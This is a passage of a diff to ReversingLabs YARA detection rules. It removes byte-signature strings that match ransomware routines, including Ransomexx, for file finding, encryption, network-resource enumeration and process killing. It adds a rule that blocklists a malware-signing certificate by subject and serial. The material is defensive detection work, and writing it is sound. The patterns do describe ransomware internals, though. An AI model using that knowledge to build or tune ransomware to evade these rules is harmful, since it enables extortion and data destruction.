-            C0 ?? 48 89 85 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 8D 85 ?? ??
-            ?? ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 41 89 D9 4C 8B 85 ?? ?? ?? ?? 48 89 E9 48 8D
-            55 ?? 48 8B 85 ?? ?? ?? ?? 44 89 4C 24 ?? 4D 89 C1 49 89 C8 48 89 C1 E8 ?? ?? ?? ??
-            48 8B 85 ?? ?? ?? ?? F7 D8 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 63 D0 48 8D 85 ??
-            ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 8B 45 ?? 4C 63 C0 48 8D 45 ?? 48
-            8D 95 ?? ?? ?? ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 2B 85
-            ?? ?? ?? ?? 48 89 C2 48 8D 85 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8
-        }
-		$encrypt_files_p3 = {
-            48 89 DA 48 8B 85 ?? ?? ?? ?? 48 01 D0 48 89 85 ?? ?? ?? ?? 90 48 89 F4 E9 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? 48 63 C8 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 49 89 C8 48
-            89 C1 E8 ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ?? 48 89 E9 48 8D 55 ?? 48 8B 85 ?? ?? ?? ??
-            C7 44 24 ?? ?? ?? ?? ?? 4D 89 C1 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            F7 D8 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 63 D0 48 8D 85 ?? ?? ?? ?? 41 B8 ?? ??
-            ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 8B 45 ?? 4C 63 C0 48 8D 45 ?? 48 8D 95 ?? ?? ?? ?? 48
-            8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 05 ?? ?? ?? ?? 48 89 85 ??
-            ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 83 F0 ?? 84
-            C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 48 98 48 8D 55 ?? 48 01 C2 48 89 E9 48 8B 85 ?? ?? ??
-            ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 8B 45 ?? 4C 63 C0 48 8D 45 ?? 48 8D 95 ?? ?? ??
-            ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 8B 45 ?? 4C 63 C0 48 8B 45 ?? 48 8D 95 ?? ??
-            ?? ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 4C 8B 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ??
-            48 8D 95 ?? ?? ?? ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 83
-            C0 ?? BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ??
-            ?? 48 8D 4A ?? 41 B8 ?? ?? ?? ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89
-         }
-		$encrypt_files_p4 = {
-            C1 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1
-            E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 41 B8
-            ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 89
-            C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 84 DB 74 ?? 48 8D 45 ?? 48 89 C1 E8
-            ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ??
-            48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DA 48 89 C1 48 8B 05 ?? ?? ?? ??
-            FF D0 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D
-            85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 F4 48 89 C3 EB ?? 48 89 C3 48 8D
-            85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ??
-            ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ??
-            ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 90 48 8D A5 ?? ??
-            ?? ?? 5B 5E 41 5C 41 5D 41 5E 41 5F 5D C3
-        }
-		$find_files_p1 = {
-            55 56 53 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 29 C4 48 8D AC 24 ?? ?? ?? ?? 48 89 8D ??
-            ?? ?? ?? 48 8D 45 ?? BB ?? ?? ?? ?? 48 89 C6 EB ?? 48 89 F1 E8 ?? ?? ?? ?? 48 83 EB
-            ?? 48 83 C6 ?? 48 85 DB 79 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8
-            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 85 C0
-            0F 95 C0 84 C0 74 ?? 48 8B 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ??
-            ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ??
-            ?? ?? ?? E9 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ??
-            84 C0 74 ?? 48 8D 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85
-            ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ??
-            ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ??
-            ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            E9 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 84 C0 74 ?? 48 8D 45 ?? 8B 95 ?? ?? ?? ?? 48 63
-            D2 48 C1 E2 ?? 48 01 C2 48 8D 85 ?? ?? ?? ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1
-            E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48
-        }
-		$find_files_p2 = {
-            89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 8B 95 ?? ?? ?? ?? 48 63 D2 48 C1 E2 ?? 48 01 C2 48
-            8D 85 ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D
-            85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ??
-            83 85 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 85 ?? ?? ?? ?? 0F 8C ?? ?? ?? ?? C6 05 ??
-            ?? ?? ?? ?? 48 8D 5D ?? 48 81 C3 ?? ?? ?? ?? 48 8D 45 ?? 48 39 C3 74 ?? 48 83 EB ??
-            48 89 D9 E8 ?? ?? ?? ?? EB ?? 90 E9 ?? ?? ?? ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89
-            C1 E8 ?? ?? ?? ?? 48 89 DE EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ??
-            ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DE EB ?? 48 89
-            C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DE EB ?? 48 89 C3 48 8D 85 ??
-            ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DE EB ?? 48 89 C6 48 8D 5D ?? 48 81 C3 ?? ??
-            ?? ?? 48 8D 45 ?? 48 39 C3 74 ?? 48 83 EB ?? 48 89 D9 E8 ?? ?? ?? ?? EB ?? 90 48 89
-            F0 48 89 C1 E8 ?? ?? ?? ?? 90 48 81 C4 ?? ?? ?? ?? 5B 5E 5D C3
-        }
-		$check_processes = {
-            55 53 48 83 EC ?? 48 8D 6C 24 ?? 48 89 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? EB ?? 8B 45 ?? 48 98 48 8D 14 C5 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 8B 1C 02 48
-            8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DA 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 85
-            C0 0F 95 C0 84 C0 74 ?? B8 ?? ?? ?? ?? EB ?? 83 45 ?? ?? 8B 45 ?? 3B 45 ?? 7C ?? B8
-            ?? ?? ?? ?? 48 83 C4 ?? 5B 5D C3
-        }
-		$kill_file_processes_p1 = {
-            55 56 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? C6 85 ??
-            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF C0
-            0F 11 45 ?? F3 0F 6F 4D ?? 0F 11 8D ?? ?? ?? ?? F3 0F 6F 55 ?? 0F 11 95 ?? ?? ?? ??
-            F3 0F 6F 5D ?? 0F 11 9D ?? ?? ?? ?? F3 0F 6F 65 ?? 0F 11 A5 ?? ?? ?? ?? 0F B7 45 ??
-            66 89 85 ?? ?? 00 00 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 49 89 D0 BA ?? ?? ??
-            ?? 48 89 C1 E8 ?? ?? ?? ?? 85 C0 0F 94 C0 84 C0 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            48 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 41 B9
-            ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 85 C0 0F 94 C0
-            84 C0 0F 84 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 4C
-            8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 89 4C 24 ?? 41 B9 ??
-            ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 75 ??
-            8B 85 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? BB ?? ?? ?? ??
-            E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 C0 48 69 F0 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF
-            D0 49 89 F0 BA ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 89 85 ?? ?? ?? ??
-            48 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? BB ?? ?? ?? ??
-            E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 4C 8B 8D ?? ??
-            ?? ?? 4C 8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 89 4C 24
-        }
-		$kill_file_processes_p2 = {
-            89 C1 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 85 ?? ?? ?? ??
-            85 C0 75 ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 8B 95 ?? ?? ?? ?? 49 89 D0 BA ?? ?? ?? ??
-            48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 8B 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? BB ?? ??
-            ?? ?? E9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0
-            89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48
-            98 48 69 D0 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 01 D0 8B 00 39 85 ?? ?? ?? ?? 75 ??
-            48 8B 05 ?? ?? ?? ?? FF D0 48 8B 95 ?? ?? ?? ?? 49 89 D0 BA ?? ?? ?? ?? 48 89 C1 48
-            8B 05 ?? ?? ?? ?? FF D0 8B 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 98 48 69 D0 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 01 D0
-            8B 00 41 89 C0 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 89 85 ??
-            ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 55 ?? 48 8B 85 ?? ?? ?? ??
-            41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 48 8B 05 ??
-            ?? ?? ?? FF D0 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48
-            8D 55 ?? 48 8D 45 ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1
-            E8 ?? ?? ?? ?? 48 8D 45 ?? 49 C7 C0 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ??
-            ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C0 ?? 48 63 C8 48 8D 45 ?? 48 8D 55
-            ?? 49 C7 C1 ?? ?? ?? ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 85 ?? ??
-            ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $check_processes ) and ( all of ( $kill_file_processes_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CLEVERCYBER LTD" and pe.signatures [ i ] . serial == "50:d0:8f:3c:9b:f8:6f:ba:52:cf:59:2b:4f:e6:ea:cf" and 1518134400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Ransomexx : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_7C7Fc3616F3157A28F702Cc1Df275Dcd : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Ransomexx ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5e62660d-2696-56c7-9322-fed6ce9d36ff"
-		date = "2020-11-26"
-		modified = "2020-11-26"
+		id = "78d2adb9-fc1c-5f48-80cb-3f1bd12b6ba5"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Ransomexx.yara#L1-L147"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14950-L14966"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "27b4132b7f16cafc40687e96a552ce59cc24ebf7679575680f170e3beee8a0a9"
+		logic_hash = "c2dcea21c7a3e3aef6408f11c23edbce6d8f655f298654552a607a9b0caabb28"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Ransomexx"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B 7D ?? 85 FF 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8B F4 B3 ?? 85 F6 74 ?? C6 46 ?? ?? B0 ?? 66 C7 06 ?? ?? 88 5E ?? 88
-            46 ?? 8B C7 8D 50 ?? 90 8A 08 40 84 C9 75 ?? 2B C2 8B D0 8B C6 8D 78 ?? 8A 08 40 84
-            C9 75 ?? 2B C7 8D 84 10 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
-            89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 7D ?? 68 ?? ?? ?? ?? 57 50 FF 15 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 56 8B 75 ?? 56 FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 56 FF 15 ?? ?? ??
-            ?? 8B F0 89 75 ?? 83 FE ?? 75 ?? FF 15 ?? ?? ?? ?? 8D A5 ?? ?? ?? ?? 5F 5E 5B 8B E5
-            5D C3 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C4 89 45 ?? 85 C0 74 ?? C6 40 ?? ?? 88 18 88
-            58 ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 49 ?? 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50
-            ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F
-            84 ?? ?? ?? ?? 8B 4D ?? 8D 85 ?? ?? ?? ?? 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A
-        }
-		$find_files_p2 = {
-            51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ??
-            ?? ?? ?? 8B C7 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 8B D0 8D 85 ?? ?? ?? ?? 8D 70 ??
-            8D 64 24 ?? 8A 08 40 84 C9 75 ?? 8B 1D ?? ?? ?? ?? 2B C6 8D 94 10 ?? ?? ?? ?? 52 6A
-            ?? FF D3 50 FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 56 FF
-            15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ??
-            ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 6A ?? 56 FF 15
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 FF 15 ?? ?? ?? ?? 85
-            C0 75 ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 56 6A ??
-            FF D3 50 FF 15 ?? ?? ?? ?? 8B 75 ?? 8D 8D ?? ?? ?? ?? 51 56 FF 15 ?? ?? ?? ?? 85 C0
-            0F 85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15
-            ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8D A5 ?? ?? ?? ?? 5F 5E
-            5B 8B E5 5D C3
-        }
-		$find_files_p3 = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 8B 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 8B C7
-            8D 50 ?? 90 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 8D B4 00 ?? ?? ?? ?? 8D 86
-            ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ??
-            ?? ?? 56 57 53 FF 15 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8D 4C 24 ??
-            51 53 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 75 ?? 8B 3D ?? ?? ?? ?? FF D7 83 F8 ??
-            0F 84 ?? ?? ?? ?? FF D7 E9 ?? ?? ?? ?? 8D A4 24 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84
-            24 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? F6 44 24 ?? ?? 0F 85 ?? ?? ?? ?? 8B
-            4D ?? 56 51 53 FF 15 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 56 8D 94 24
-            ?? ?? ?? ?? 52 53 FF 15 ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? E8 ?? ?? ?? ?? 85 C0 0F 85
-            ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0
-            74 ?? 66 83 38 ?? 74 ?? 68 ?? ?? ?? ?? 50 FF D7 85 C0 75 ?? FF 05 ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 8D 7C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 39 05 ?? ?? ?? ?? 0F 84
-            ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 54 24 ?? 52 FF D7 85 C0 74 ?? 8D 44
-        }
-		$find_files_p4 = {
-            24 ?? 50 8D 4C 24 ?? 51 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 0F B7 44 24 ?? 8B 0D ??
-            ?? ?? ?? 3B C1 74 ?? 49 3B C1 74 ?? 8D 54 24 ?? 52 8D 44 24 ?? 50 FF D7 85 C0 74 ??
-            8D 4C 24 ?? 51 8D 54 24 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 0F B7 44 24 ?? 8B
-            0D ?? ?? ?? ?? 3B C1 74 ?? 49 3B C1 74 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ??
-            ?? ?? ?? 8B 44 24 ?? 0B 44 24 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 6A ?? 6A ?? 50 51 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ??
-            80 3B ?? 75 ?? 80 7B ?? ?? 75 ?? 8B 15 ?? ?? ?? ?? 8D 3C 85 ?? ?? ?? ?? 8B 04 17 53
-            50 FF 15 ?? ?? ?? ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 3C 85 ?? ?? ?? ?? 8B 14 0F 68 ?? ??
-            ?? ?? 52 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 0C 07 68 ?? ?? ?? ?? 53 51 FF 15 ?? ??
-            ?? ?? 8B 15 ?? ?? ?? ?? 8B 04 17 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 8B 54 24 ?? 8D 4C 24 ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24
-            ?? 50 FF 15 ?? ?? ?? ?? 53 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 5F 5E 33 C0
-            5B 8B E5 5D C2
-        }
-		$enum_network_resources = {
-            55 8B EC 8B 4D ?? 83 EC ?? 8D 45 ?? 50 51 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0
-            0F 85 ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 6A ?? C7 45 ?? ?? ?? ?? ??
-            FF D3 50 FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 57 90 8B 4D ?? 8D
-            55 ?? 52 56 8D 45 ?? 50 51 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ??
-            ?? ?? 33 FF 39 7D ?? 76 ?? 83 C6 ?? 8D 64 24 ?? F6 46 ?? ?? 74 ?? F6 46 ?? ?? 74 ??
-            8B 06 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 8D 94 00 ?? ?? ?? ?? 52
-            6A ?? FF D3 50 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 04 8D ?? ?? ?? ?? 85 C0 74 ??
-            8B 16 0F B7 0A 66 89 08 83 C2 ?? 83 C0 ?? 66 85 C9 75 ?? FF 05 ?? ?? ?? ?? 8B 56 ??
-            83 E2 ?? 80 FA ?? 75 ?? 8D 46 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 47 83 C6 ?? 3B 7D ?? 72
-            ?? 8B 75 ?? E9 ?? ?? ?? ?? 56 6A ?? FF D3 50 FF 15 ?? ?? ?? ?? 5F 8B 4D ?? 51 FF 15
-            ?? ?? ?? ?? 5E 5B 8B E5 5D C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 83 EC ?? 53 56 57 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            89 45 ?? 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? B8 ?? ?? ?? ?? 89 4D ?? E8 ?? ?? ??
-            ?? 8B F4 85 F6 0F 84 ?? ?? ?? ?? 8B D6 81 EA ?? ?? ?? ?? 83 C2 ?? 89 55 ?? 8B D6 81
-            EA ?? ?? ?? ?? 83 C2 ?? 89 55 ?? 8B D6 8B CE 8B FE 81 EA ?? ?? ?? ?? 33 C0 81 E9 ??
-            ?? ?? ?? 81 EF ?? ?? ?? ?? 83 C2 ?? C6 46 ?? ?? 89 55 ?? 8B 5D ?? 8A D0 80 E2 ?? 02
-            90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 01 ?? ?? ?? ?? 8D 50 ?? 80 E2 ?? 02 90 ?? ??
-            ?? ?? 32 90 ?? ?? ?? ?? 88 94 07 ?? ?? ?? ?? 8D 50 ?? 80 E2 ?? 02 90 ?? ?? ?? ?? 32
-            90 ?? ?? ?? ?? 88 94 03 ?? ?? ?? ?? 8B 5D ?? 8D 50 ?? 80 E2 ?? 02 90 ?? ?? ?? ?? 32
-            90 ?? ?? ?? ?? 88 94 03 ?? ?? ?? ?? 8B 5D ?? 8D 50 ?? 80 E2 ?? 02 90 ?? ?? ?? ?? 32
-            90 ?? ?? ?? ?? 88 94 03 ?? ?? ?? ?? 8D 50 ?? 80 E2 ?? 02 90 ?? ?? ?? ?? 83 C0 ?? 32
-            90 ?? ?? ?? ?? 88 54 06 ?? 83 F8 ?? 0F 8C ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 4D ?? 50 51
